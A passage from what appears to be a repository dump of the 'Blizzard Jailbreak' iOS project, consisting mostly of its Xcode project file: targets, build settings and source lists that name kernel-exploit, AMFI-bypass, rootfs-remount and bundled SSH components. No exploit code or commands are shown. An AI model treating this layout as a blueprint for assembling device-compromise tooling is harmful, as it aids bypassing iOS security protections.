\"com.apple.product-type.bundle.unit-test\";\n\t\t};\n\t\t82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */ = {\n\t\t\tisa = PBXNativeTarget;\n\t\t\tbuildConfigurationList = 82F17A1E22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakUITests\" */;\n\t\t\tbuildPhases = (\n\t\t\t\t82F17A0B22DF4ED800231F8C /* Sources */,\n\t\t\t\t82F17A0C22DF4ED800231F8C /* Frameworks */,\n\t\t\t\t82F17A0D22DF4ED800231F8C /* Resources */,\n\t\t\t);\n\t\t\tbuildRules = (\n\t\t\t);\n\t\t\tdependencies = (\n\t\t\t\t82F17A1122DF4ED800231F8C /* PBXTargetDependency */,\n\t\t\t);\n\t\t\tname = \"Blizzard JailbreakUITests\";\n\t\t\tproductName = socket_freeUITests;\n\t\t\tproductReference = 82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */;\n\t\t\tproductType = \"com.apple.product-type.bundle.ui-testing\";\n\t\t};\n/* End PBXNativeTarget section */\n\n/* Begin PBXProject section */\n\t\t82F179E422DF4ED700231F8C /* Project object */ = {\n\t\t\tisa = PBXProject;\n\t\t\tattributes = {\n\t\t\t\tLastUpgradeCheck = 1010;\n\t\t\t\tORGANIZATIONNAME = GeoSn0w;\n\t\t\t\tTargetAttributes = {\n\t\t\t\t\t82F179EB22DF4ED700231F8C = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 9.2;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t};\n\t\t\t\t\t82F17A0322DF4ED800231F8C = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 9.2;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t\tTestTargetID = 82F179EB22DF4ED700231F8C;\n\t\t\t\t\t};\n\t\t\t\t\t82F17A0E22DF4ED800231F8C = {\n\t\t\t\t\t\tCreatedOnToolsVersion = 9.2;\n\t\t\t\t\t\tProvisioningStyle = Automatic;\n\t\t\t\t\t\tTestTargetID = 82F179EB22DF4ED700231F8C;\n\t\t\t\t\t};\n\t\t\t\t};\n\t\t\t};\n\t\t\tbuildConfigurationList = 82F179E722DF4ED700231F8C /* Build configuration list for PBXProject \"Blizzard Jailbreak\" */;\n\t\t\tcompatibilityVersion = \"Xcode 8.0\";\n\t\t\tdevelopmentRegion = en;\n\t\t\thasScannedForEncodings = 0;\n\t\t\tknownRegions = (\n\t\t\t\ten,\n\t\t\t\tBase,\n\t\t\t);\n\t\t\tmainGroup = 82F179E322DF4ED700231F8C;\n\t\t\tproductRefGroup = 82F179ED22DF4ED700231F8C /* Products */;\n\t\t\tprojectDirPath = \"\";\n\t\t\tprojectRoot = \"\";\n\t\t\ttargets = (\n\t\t\t\t82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */,\n\t\t\t\t82F17A0322DF4ED800231F8C /* Blizzard JailbreakTests */,\n\t\t\t\t82F17A0E22DF4ED800231F8C /* Blizzard JailbreakUITests */,\n\t\t\t);\n\t\t};\n/* End PBXProject section */\n\n/* Begin PBXResourcesBuildPhase section */\n\t\t82F179EA22DF4ED700231F8C /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */,\n\t\t\t\t82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */,\n\t\t\t\tD62BC51E24E4113200EC63D4 /* tar in Resources */,\n\t\t\t\tD62BC52024E41AF500EC63D4 /* basebins.tar in Resources */,\n\t\t\t\tD62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */,\n\t\t\t\t82F179F722DF4ED700231F8C /* Main.storyboard in Resources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0222DF4ED800231F8C /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0D22DF4ED800231F8C /* Resources */ = {\n\t\t\tisa = PBXResourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXResourcesBuildPhase section */\n\n/* Begin PBXSourcesBuildPhase section */\n\t\t82F179E822DF4ED700231F8C /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */,\n\t\t\t\tD613B75724E2E8300069CA9B /* amfi_utils.m in Sources */,\n\t\t\t\tD6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */,\n\t\t\t\tD62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */,\n\t\t\t\tD69C4CB225686895001DE2BC /* libsnappy.c in Sources */,\n\t\t\t\tD69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */,\n\t\t\t\tD69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */,\n\t\t\t\tD613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */,\n\t\t\t\t82F179FF22DF4ED700231F8C /* main.m in Sources */,\n\t\t\t\tD613B75824E2E8300069CA9B /* amfid_tools.m in Sources */,\n\t\t\t\tD613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */,\n\t\t\t\tD613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */,\n\t\t\t\tD613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */,\n\t\t\t\tD613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */,\n\t\t\t\tD62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */,\n\t\t\t\t82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */,\n\t\t\t\t82F17A2322DF4EF100231F8C /* exploit.c in Sources */,\n\t\t\t\tD613B75C24E2E8590069CA9B /* amfid.m in Sources */,\n\t\t\t\t82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */,\n\t\t\t\tD613B75924E2E8300069CA9B /* amfid_mem.m in Sources */,\n\t\t\t\tD62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */,\n\t\t\t\tD69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */,\n\t\t\t\tD613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */,\n\t\t\t\tD613B76024E2EEFD0069CA9B /* osobject.c in Sources */,\n\t\t\t\t8288501522E07C15005D10FC /* offsets.m in Sources */,\n\t\t\t\tD69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */,\n\t\t\t\t8288501222E07303005D10FC /* kernel_memory.c in Sources */,\n\t\t\t\tD613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */,\n\t\t\t\tD62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */,\n\t\t\t\tD63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */,\n\t\t\t\tD69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0022DF4ED800231F8C /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n\t\t82F17A0B22DF4ED800231F8C /* Sources */ = {\n\t\t\tisa = PBXSourcesBuildPhase;\n\t\t\tbuildActionMask = 2147483647;\n\t\t\tfiles = (\n\t\t\t\t82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */,\n\t\t\t);\n\t\t\trunOnlyForDeploymentPostprocessing = 0;\n\t\t};\n/* End PBXSourcesBuildPhase section */\n\n/* Begin PBXTargetDependency section */\n\t\t82F17A0622DF4ED800231F8C /* PBXTargetDependency */ = {\n\t\t\tisa = PBXTargetDependency;\n\t\t\ttarget = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;\n\t\t\ttargetProxy = 82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */;\n\t\t};\n\t\t82F17A1122DF4ED800231F8C /* PBXTargetDependency */ = {\n\t\t\tisa = PBXTargetDependency;\n\t\t\ttarget = 82F179EB22DF4ED700231F8C /* Blizzard Jailbreak */;\n\t\t\ttargetProxy = 82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */;\n\t\t};\n/* End PBXTargetDependency section */\n\n/* Begin PBXVariantGroup section */\n\t\t82F179F522DF4ED700231F8C /* Main.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179F622DF4ED700231F8C /* Base */,\n\t\t\t);\n\t\t\tname = Main.storyboard;\n\t\t\tsourceTree = \"\";\n\t\t};\n\t\t82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */ = {\n\t\t\tisa = PBXVariantGroup;\n\t\t\tchildren = (\n\t\t\t\t82F179FB22DF4ED700231F8C /* Base */,\n\t\t\t);\n\t\t\tname = LaunchScreen.storyboard;\n\t\t\tsourceTree = \"\";\n\t\t};\n/* End PBXVariantGroup section */\n\n/* Begin XCBuildConfiguration section */\n\t\t82F17A1622DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++14\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_COMMA = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;\n\t\t\t\tCLANG_WARN_OBJC_LITERAL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_RANGE_LOOP_ANALYSIS = YES;\n\t\t\t\tCLANG_WARN_STRICT_PROTOTYPES = YES;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVE = YES;\n\t\t\t\tCLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = dwarf;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tENABLE_TESTABILITY = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu11;\n\t\t\t\tGCC_DYNAMIC_NO_PIC = NO;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_OPTIMIZATION_LEVEL = 0;\n\t\t\t\tGCC_PREPROCESSOR_DEFINITIONS = (\n\t\t\t\t\t\"DEBUG=1\",\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t);\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.2;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = YES;\n\t\t\t\tONLY_ACTIVE_ARCH = YES;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A1722DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = NO;\n\t\t\t\tCLANG_ANALYZER_NONNULL = YES;\n\t\t\t\tCLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;\n\t\t\t\tCLANG_CXX_LANGUAGE_STANDARD = \"gnu++14\";\n\t\t\t\tCLANG_CXX_LIBRARY = \"libc++\";\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCLANG_ENABLE_OBJC_ARC = YES;\n\t\t\t\tCLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;\n\t\t\t\tCLANG_WARN_BOOL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_COMMA = YES;\n\t\t\t\tCLANG_WARN_CONSTANT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;\n\t\t\t\tCLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;\n\t\t\t\tCLANG_WARN_DOCUMENTATION_COMMENTS = YES;\n\t\t\t\tCLANG_WARN_EMPTY_BODY = YES;\n\t\t\t\tCLANG_WARN_ENUM_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_INFINITE_RECURSION = YES;\n\t\t\t\tCLANG_WARN_INT_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;\n\t\t\t\tCLANG_WARN_OBJC_LITERAL_CONVERSION = YES;\n\t\t\t\tCLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;\n\t\t\t\tCLANG_WARN_RANGE_LOOP_ANALYSIS = YES;\n\t\t\t\tCLANG_WARN_STRICT_PROTOTYPES = YES;\n\t\t\t\tCLANG_WARN_SUSPICIOUS_MOVE = YES;\n\t\t\t\tCLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;\n\t\t\t\tCLANG_WARN_UNREACHABLE_CODE = YES;\n\t\t\t\tCLANG_WARN__DUPLICATE_METHOD_MATCH = YES;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\tCOPY_PHASE_STRIP = NO;\n\t\t\t\tDEBUG_INFORMATION_FORMAT = \"dwarf-with-dsym\";\n\t\t\t\tENABLE_NS_ASSERTIONS = NO;\n\t\t\t\tENABLE_STRICT_OBJC_MSGSEND = YES;\n\t\t\t\tGCC_C_LANGUAGE_STANDARD = gnu11;\n\t\t\t\tGCC_NO_COMMON_BLOCKS = YES;\n\t\t\t\tGCC_WARN_64_TO_32_BIT_CONVERSION = YES;\n\t\t\t\tGCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;\n\t\t\t\tGCC_WARN_UNDECLARED_SELECTOR = YES;\n\t\t\t\tGCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;\n\t\t\t\tGCC_WARN_UNUSED_FUNCTION = YES;\n\t\t\t\tGCC_WARN_UNUSED_VARIABLE = YES;\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.2;\n\t\t\t\tMTL_ENABLE_DEBUG_INFO = NO;\n\t\t\t\tSDKROOT = iphoneos;\n\t\t\t\tVALIDATE_PRODUCT = YES;\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\t82F17A1922DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = YES;\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = U7CBM293CM;\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tHEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tINFOPLIST_FILE = \"$(SRCROOT)/Blizzard Jailbreak/Info.plist\";\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.0;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tLIBRARY_SEARCH_PATHS = (\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t\t\"$(PROJECT_DIR)/sock_port\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t);\n\t\t\t\tOTHER_CPLUSPLUSFLAGS = \"$(OTHER_CFLAGS)\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = com.geosn0w.blizzard;\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tPROVISIONING_PROFILE_SPECIFIER = \"\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tUSER_HEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tVALID_ARCHS = \"arm64 arm64e armv7\";\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A1A22DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tALWAYS_SEARCH_USER_PATHS = YES;\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCODE_SIGN_IDENTITY = \"iPhone Developer\";\n\t\t\t\t\"CODE_SIGN_IDENTITY[sdk=iphoneos*]\" = \"iPhone Developer\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = U7CBM293CM;\n\t\t\t\tENABLE_BITCODE = NO;\n\t\t\t\tHEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tINFOPLIST_FILE = \"$(SRCROOT)/Blizzard Jailbreak/Info.plist\";\n\t\t\t\tIPHONEOS_DEPLOYMENT_TARGET = 11.0;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tLIBRARY_SEARCH_PATHS = (\n\t\t\t\t\t\"$(inherited)\",\n\t\t\t\t\t\"$(PROJECT_DIR)/sock_port\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t\t\"$(PROJECT_DIR)/Helper\\\\ Libraries\",\n\t\t\t\t);\n\t\t\t\tOTHER_CPLUSPLUSFLAGS = \"$(OTHER_CFLAGS)\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = com.geosn0w.blizzard;\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tPROVISIONING_PROFILE_SPECIFIER = \"\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tUSER_HEADER_SEARCH_PATHS = \"\\\"$(SRCROOT)/sock_port/include\\\"\";\n\t\t\t\tVALID_ARCHS = \"arm64 arm64e armv7\";\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\t82F17A1C22DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tBUNDLE_LOADER = \"$(TEST_HOST)\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeTests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeTests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_HOST = \"$(BUILT_PRODUCTS_DIR)/Blizzard Jailbreak.app/Blizzard Jailbreak\";\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A1D22DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tBUNDLE_LOADER = \"$(TEST_HOST)\";\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeTests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeTests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_HOST = \"$(BUILT_PRODUCTS_DIR)/Blizzard Jailbreak.app/Blizzard Jailbreak\";\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n\t\t82F17A1F22DF4ED800231F8C /* Debug */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeUITests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeUITests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_TARGET_NAME = socket_free;\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\t82F17A2022DF4ED800231F8C /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tCODE_SIGN_STYLE = Automatic;\n\t\t\t\tDEVELOPMENT_TEAM = 22G2QV87A2;\n\t\t\t\tINFOPLIST_FILE = socket_freeUITests/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks @loader_path/Frameworks\";\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.jakeashacks.socket-freeUITests\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tTARGETED_DEVICE_FAMILY = \"1,2\";\n\t\t\t\tTEST_TARGET_NAME = socket_free;\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n/* End XCBuildConfiguration section */\n\n/* Begin XCConfigurationList section */\n\t\t82F179E722DF4ED700231F8C /* Build configuration list for PBXProject \"Blizzard Jailbreak\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1622DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A1722DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\t82F17A1822DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard Jailbreak\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1922DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A1A22DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\t82F17A1B22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakTests\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1C22DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A1D22DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\t82F17A1E22DF4ED800231F8C /* Build configuration list for PBXNativeTarget \"Blizzard JailbreakUITests\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\t82F17A1F22DF4ED800231F8C /* Debug */,\n\t\t\t\t82F17A2022DF4ED800231F8C /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n/* End XCConfigurationList section */\n\t};\n\trootObject = 82F179E422DF4ED700231F8C /* Project object */;\n}\n" }, { "path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/contents.xcworkspacedata", "content": "\n\n \n \n\n" }, { "path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist", "content": "\n\n\n\n\tIDEDidComputeMac32BitWarning\n\t\n\n\n" }, { "path": "Blizzard Jailbreak.xcodeproj/xcshareddata/xcschemes/sock_port.xcscheme", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/geosn0w.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist", "content": "\n\n\n" }, { "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist", "content": "\n\n\n\n\tSchemeUserState\n\t\n\t\tsocket_free.xcscheme\n\t\t\n\t\t\torderHint\n\t\t\t0\n\t\t\n\t\n\n\n" }, { "path": "Blizzard Jailbreak.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist", "content": 